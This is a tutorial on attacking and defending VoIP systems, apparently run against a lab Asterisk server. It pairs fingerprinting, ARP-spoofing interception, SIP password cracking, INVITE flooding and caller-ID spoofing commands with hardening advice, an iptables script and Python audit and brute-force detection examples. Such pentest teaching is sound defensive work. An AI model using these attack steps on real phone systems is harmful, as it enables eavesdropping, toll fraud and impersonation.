
Attacking and Defending VOIP Systems

By Ahmad Qubbaj

VOIP introduction:
Voice over Internet Protocol (VoIP) is a methodology and group of technologies for the
delivery of voice communications and multimedia sessions over Internet Protocol (IP)
networks, such as the Internet. Other terms commonly associated with VoIP are IP
telephony, Internet telephony, voice over broadband (VoBB), broadband telephony, IP
communications, and broadband phone service.
VoIP is an exciting technology which provides many benefits and cost-effective
solutions for communication. More and more small and enterprise businesses are
replacing their old traditional telephony systems with IP based ones.
A VoIP based PBX can provide many features such as: multiple extensions, caller ID,
voice mail, IVR capabilities, recording of conversations, logging, and use with hardware
based telephones or software based ones, aka soft phones.
Nowadays there are many vendors of PBXs, IP telephones, VoIP services and equipment,
such as CISCO, AVAYA, ASTERISK, SNOM and THOMSON. With new technology comes
a new challenge for both the defensive and offensive side of security.

Typical VoIP Topologies:

There are several ways IP based telephony can be implemented; here are some
common topologies:

Self Hosted
A PBX (i.e. Asterisk) is installed at the client site and connected to an ISP or telephony
service provider PSTN via a SIP trunk/PRI; the VoIP traffic flows through a dedicated
VLAN.

Hosted Services
There is no need for a PBX on site, just a switch, a router, IP phones and a connection
to the service provider's PBX via the Internet or an IP/VPN connection; each phone is
configured with SIP account information.

Online SIP Service
Services like sipme.me provide an application for PC or smart phones and a free SIP
account, offering low prices for international calls and free calls between the service's
users by assigning a phone number to each subscriber.

VOIP Pentest Methodology:

[*] Reconnaissance VOIP Servers
In this stage we are trying to understand the target system; information like server
type, system version, open ports, RTP or RTSP will be extremely important.

[*] Sniffing VOIP Traffic
Intercepting, manipulating, and listening to the conversations.

[*] Cracking VOIP Accounts
Getting unauthorized accounts on the system (usernames and passwords).

[*] Denial of Service on VOIP Servers
DoS against the VOIP servers.

[*] Spoofing and identity theft
Calling someone as someone else; identity theft.

Testing Environment:

Target system: asterisk
Target IP: 192.168.0.104
Target OS: Centos
Date: 7/01/2013

Reconnaissance VOIP Servers


You can get all the information that you need about the VoIP server using tools
like smap, sipsak and svmap.py.

ATTACK..
root@qubbaj:~# ./smap -O 192.168.0.104
smap 0.6.0 <hs@123.org> http://www.wormulon.net/
192.168.0.104: ICMP reachable, SIP enabled
best guess (77% sure) fingerprint:
Asterisk PBX SVN-trunk-r56579
Server: Asterisk PBX 1.6.2.0
1 host scanned, 1 ICMP reachable, 1 SIP enabled (100.0%)
root@qubbaj:~#
root@qubbaj:~# sipsak -vv -s sip:192.168.0.104
From: sip:sipsak@127.0.1.1:54669;tag=7244113d
To: sip:192.168.0.104;tag=as383f41be
Call-ID: 1917063485@127.0.1.1
CSeq: 1 OPTIONS
Server: Asterisk PBX 1.6.2.0
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO
Supported: replaces, timer
Accept: application/sdp
Content-Length: 0
root@qubbaj:~#
root@qubbaj:~# ./svmap.py 192.168.0.104 --fp
| SIP Device         | User Agent           | Fingerprint |
------------------------------------------------------------
| 192.168.0.104:5060 | Asterisk PBX 1.6.2.0 | Asterisk    |
root@qubbaj:~#

Reconnaissance VOIP Servers


DEFENCE..

1) Customize the User-Agent field in sip.conf: useragent = <string> allows
the SIP header "User-Agent" to be customized. The default is "Asterisk PBX".

2) Block ICMP echo requests using iptables.

3) Block the OPTIONS method to hide the other methods: set qualify=no in
sip.conf. qualify= means Asterisk uses SIP OPTIONS to ping a device every minute to
make sure it still has a connection and to renew NAT mappings if applicable.

4) Set alwaysauthreject=yes in your sip.conf file. The default is no, which
allows extension information leakage. Setting this to yes will reject bad
authentication requests on valid usernames with the same rejection
information as with invalid usernames, denying remote attackers the ability to
detect existing extensions with brute-force guessing attacks.

5) Allow only one or two calls at a time per SIP entity, where possible. At the
worst, limiting your exposure to toll fraud is a wise thing to do. This also limits
your exposure when legitimate password holders on your system lose control of
their passphrase, for instance by writing it on the bottom of the SIP phone, which
I've seen.

6) Ensure your [default] context is secure. Don't allow unauthenticated callers
to reach any contexts: set allowguest=no in the [general] part of sip.conf.
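An added example (not from the original page or from the Asterisk project) that turns the sip.conf rules above, plus the strong-password rule from the Cracking VOIP Accounts defence, into an audit of a configuration file. The two sip.conf fragments and the peer names are constructed for the demonstration; Asterisk's ini-like syntax is read with Python's configparser.

```python
import configparser

# Constructed sip.conf fragments (not from any real deployment): one with the
# weak defaults this page warns about, one hardened per the DEFENCE lists.
WEAK_SIP_CONF = """\
[general]
allowguest=yes
alwaysauthreject=no
useragent=Asterisk PBX
[6020]
type=friend
secret=6020pass
qualify=yes
"""
HARDENED_SIP_CONF = """\
[general]
allowguest=no
alwaysauthreject=yes
useragent=PBX
[pbx-user-a71x]
type=friend
secret=Vz8.kq2Lm!9rTw4p
call-limit=2
qualify=no
"""
# key -> (Asterisk default when the key is absent, value we want)
GENERAL_RULES = {"allowguest": ("yes", "no"), "alwaysauthreject": ("no", "yes")}

def audit_sip_conf(text):
    # Returns a list of findings; an empty list means every check passed.
    cp = configparser.ConfigParser(strict=False, interpolation=None, delimiters=("=",),
                                   comment_prefixes=(";", "#"), inline_comment_prefixes=(";",))
    cp.read_string(text)
    findings = []
    general = cp["general"] if cp.has_section("general") else {}
    for key, (default, wanted) in GENERAL_RULES.items():
        if general.get(key, default).lower() != wanted:
            findings.append(f"[general] {key} should be {wanted}")
    if general.get("useragent", "Asterisk PBX").startswith("Asterisk"):
        findings.append("[general] useragent reveals Asterisk, set a custom string")
    for name in cp.sections():
        if name == "general":
            continue
        peer = cp[name]
        if "secret" in peer and (len(peer["secret"]) < 12 or name in peer["secret"]):
            findings.append(f"[{name}] weak secret: under 12 chars or contains the peer name")
        if "call-limit" not in peer:
            findings.append(f"[{name}] no call-limit, toll fraud exposure is unbounded")
        if peer.get("qualify", "no").lower() != "no":
            findings.append(f"[{name}] qualify={peer['qualify']}, OPTIONS pings are enabled")
    return findings
```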

Sniffing VOIP Traffic


arpspoof and Wireshark can do the job: a simple arpspoof -> MITM ->
Wireshark to capture some traffic. Wireshark has a built-in RTP
player.

ATTACK..
root@qubbaj:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@qubbaj:~# arpspoof -i wlan0 -t 192.168.0.104 192.168.0.2

Sniffing VOIP Traffic


DEFENCE..
1) Use the SRTP protocol, RTP over SSL, instead of plain RTP.

Cracking VOIP Accounts


Using the sipvicious built-in word-list and svcrack.py we have the ability to brute-force
a VoIP account, and now we can make free calls.

ATTACK..
root@qubbaj:sipvicious# ./svcrack.py -u6020 -d pass.txt 192.168.0.104
| Extension | Password |
------------------------
| 6020      | 6020pass |
root@qubbaj:sipvicious#

Cracking VOIP Accounts


DEFENCE..
1) Use STRONG passwords for SIP entities. Use symbols, numbers, and a
mix of upper and lowercase letters, at least 12 characters long.
2) Make your SIP usernames different from your extensions. While it
is convenient to have extension 1234 map to SIP entry 1234 which
is also SIP user 1234, this makes it easy for attackers to
guess SIP authentication names.
3) Fail2Ban is a limited intrusion detection/prevention system. It works by
scanning log files and then taking action based on the entries in those logs.
Implement Fail2Ban with a configuration that prevents SIP brute
force attacks against Asterisk PBXs.
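The Fail2Ban approach from item 3, as an added example (not part of the original page or of Fail2Ban itself): a minimal version of its maxretry/findtime rule run over Asterisk log lines. The log lines are constructed here, modelled on chan_sip registration-failure notices; the regex is an assumption and should be checked against the wording your own Asterisk version writes.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log lines modelled on chan_sip NOTICE messages; the exact wording
# differs between Asterisk releases, so adjust FAILED_REG to your own log.
SAMPLE_LOG = """\
[2013-01-07 10:00:01] NOTICE[2231] chan_sip.c: Registration from '"6020" <sip:6020@192.168.0.104>' failed for '192.168.0.50' - Wrong password
[2013-01-07 10:00:02] NOTICE[2231] chan_sip.c: Registration from '"6020" <sip:6020@192.168.0.104>' failed for '192.168.0.50' - Wrong password
[2013-01-07 10:00:02] NOTICE[2231] chan_sip.c: Registration from '"6021" <sip:6021@192.168.0.104>' failed for '192.168.0.50' - No matching peer found
[2013-01-07 10:00:03] NOTICE[2231] chan_sip.c: Registration from '"6020" <sip:6020@192.168.0.104>' failed for '192.168.0.50' - Wrong password
[2013-01-07 10:00:40] NOTICE[2231] chan_sip.c: Registration from '"6020" <sip:6020@192.168.0.104>' failed for '192.168.0.50' - Wrong password
[2013-01-07 10:00:41] NOTICE[2231] chan_sip.c: Registration from '"6020" <sip:6020@192.168.0.104>' failed for '192.168.0.50' - Wrong password
[2013-01-07 10:05:00] NOTICE[2231] chan_sip.c: Registration from '"6010" <sip:6010@192.168.0.104>' failed for '192.168.0.77' - Wrong password
"""

FAILED_REG = re.compile(
    r"^\[(?P<ts>[^\]]+)\] NOTICE\[\d+\] chan_sip\.c: Registration from '.*' "
    r"failed for '(?P<ip>[\d.]+)(?::\d+)?' - (?P<why>.+)$")

def find_bruteforcers(log_text, maxretry=5, findtime=timedelta(seconds=60)):
    """Return {ip: ban time} for sources with maxretry or more failed
    registrations inside one findtime window (Fail2Ban's maxretry/findtime rule)."""
    attempts = defaultdict(list)   # ip -> timestamps still inside the window
    banned = {}
    for line in log_text.splitlines():
        m = FAILED_REG.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S")
        ip = m["ip"]
        if ip in banned:
            continue               # already banned; later lines don't matter
        # keep only attempts within findtime of this one, then add this one
        attempts[ip] = [t for t in attempts[ip] if ts - t <= findtime] + [ts]
        if len(attempts[ip]) >= maxretry:
            banned[ip] = ts        # here Fail2Ban would insert the iptables ban
    return banned
```

The single failure from 192.168.0.77 never reaches the threshold, so only 192.168.0.50 is reported; the bantime and the actual firewall action are left to Fail2Ban's jail configuration.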

Denial of Service on VOIP Servers


ATTACK..
root@qubbaj:# ./inviteflood eth0 target_extension target_domain target_ip number_of_packets
root@qubbaj:#

Denial of Service on VOIP Servers


DEFENCE..
I have no idea..

Spoofing and identity theft


Spoofing the Caller ID in SIP is fairly easy: you just need to change the
From header of the SIP INVITE request.

ATTACK..
INVITE sip:@127.0.0.1 SIP/2.0
To: <sip:192.168.1.104>
Via: SIP/2.0/UDP 192.168.1.104
From: "Evil Hacker"
Call-ID: 14810.0.1.45
CSeq: 1 INVITE
Max-Forwards: 20

DEFENCE..
I have no idea..

iptables script to secure SIP and the other services


#!/bin/bash
# Edit eth0 to your interface
EXIF="eth0"
# Flush iptables
/sbin/iptables --flush
# Drop all incoming traffic but allow all outgoing traffic. This
# will allow us to make outgoing connections from any port, but will
# only allow incoming connections on the ports specified below.
/sbin/iptables --policy INPUT DROP
/sbin/iptables --policy OUTPUT ACCEPT
# Allow all incoming traffic if it is coming from the local loopback device
/sbin/iptables -A INPUT -i lo -j ACCEPT
# Accept all incoming traffic associated with an established connection, or a "related" connection
/sbin/iptables -A INPUT -i $EXIF -m state --state ESTABLISHED,RELATED -j ACCEPT
# Check new packets are SYN packets for syn-flood protection
/sbin/iptables -A INPUT -p tcp ! --syn -m state --state NEW -j DROP
# Drop fragmented packets
/sbin/iptables -A INPUT -f -j DROP
# Drop malformed XMAS packets
/sbin/iptables -A INPUT -p tcp --tcp-flags ALL ALL -j DROP
# Drop null packets
/sbin/iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP
# Allow connections to port 22 - ssh. You can add other ports you need in here
/sbin/iptables -A INPUT -p tcp -i $EXIF --dport 22 -m state --state NEW -j ACCEPT
# Allow connections from my machines
/sbin/iptables -A INPUT -p tcp -i $EXIF -m state --state NEW -s 100.101.5.182 -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i $EXIF -m state --state NEW -s 200.123.88.196 -j ACCEPT
# Allow SIP connections (signalling on 5060)
/sbin/iptables -A INPUT -p udp -i $EXIF --dport 5060 -m udp -j ACCEPT
/sbin/iptables -A INPUT -p tcp -i $EXIF --dport 5060 -m tcp -j ACCEPT
# Allow the RTP media port range (Asterisk's default rtp.conf range)
/sbin/iptables -A INPUT -p udp -i $EXIF --dport 10000:20000 -m udp -j ACCEPT
# Allow icmp input so that people can ping us
# (note: DEFENCE item 2 of the reconnaissance section suggests blocking this instead)
/sbin/iptables -A INPUT -p icmp --icmp-type 8 -m state --state NEW -j ACCEPT
# Log then drop any packets that are not allowed. You will probably want to turn off the logging
#/sbin/iptables -A INPUT -j LOG
/sbin/iptables -A INPUT -j REJECT

VOIP security tools Full List

Scanning
fping
Nessus
nmap
snmpwalk
SNSscan
SuperScan
VLANping

Enumeration
netcat
SiVuS
sipsak
SIPSCAN
smap
TFTP Brute Forcer

Infrastructure Denial of Service
DNS Auditing tool
Internetwork Routing Protocol Attack Suite
UDP Flooder
UDP Flooder w/VLAN support
Wireshark (formerly Ethereal)

Eavesdropping
Angst
Cain and Abel
DTMF Decoder
dsniff
NetStumbler
Oreka
VoIPong
vomit

Network and Application Interception
arpwatch
Cain and Abel
dsniff
ettercap
fragrouter
siprogue
XArp

Cisco Unified CallManager
Skinny Traffic Sample

Asterisk
IAX Flooder
IAX Enumerator

Fuzzing
ohrwurm RTP fuzzer
PROTOS SIP fuzzing suite
TCPView

Disruption of Service
INVITE Flooder
RTP Flooder
UDP Flooder
UDP Flooder w/VLAN support

Signaling and Media Manipulation
AuthTool
BYE Teardown
Check Sync Phone Rebooter
RedirectPoison
Registration Hijacker
Registration Eraser
Registration Adder
RTP InsertSound v2.0
RTP InsertSound v3.0
RTP MixSound v2.0
RTP MixSound v3.0

References
https://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Endler.pdf
http://en.wikipedia.org/wiki/Voice_over_IP
http://www.backtrack-linux.org/wiki/index.php/Pentesting_VOIP
http://www.hackingvoip.com/sec_tools.html
